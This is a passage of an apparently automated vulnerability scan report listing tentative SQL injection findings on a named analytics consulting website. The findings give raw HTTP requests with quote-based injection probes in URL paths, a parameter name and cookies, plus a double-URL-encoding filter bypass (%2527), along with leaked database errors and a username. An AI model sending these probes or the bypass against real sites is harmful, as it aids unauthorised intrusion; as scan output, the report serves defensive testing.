Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:31:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:31:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:31:06 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:31:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.146. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/87-visitor-scoring-with-urchin.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin'/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:25:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin''/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:25:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:25:09 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:25:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.147. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/87-visitor-scoring-with-urchin.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:35:10 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:35:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.148. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/88-urchin-vs-google-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/88-urchin-vs-google-analytics.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/88-urchin-vs-google-analytics.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.149. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/94-exclude-bots-in-urchin.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:50:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.150. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/94-exclude-bots-in-urchin.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 02:10:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 02:10:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.151. http://www.analyticspros.com/blog/webanalytics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/webanalytics.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/webanalytics.html' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:45:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/webanalytics.html'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:45:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:45:36 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:45:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.152. http://www.analyticspros.com/blog/webanalytics.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/webanalytics.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/webanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/webanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.153. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /component/content/article/62-urchin/118-urchin-7-now-available.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /component/content/article/62-urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
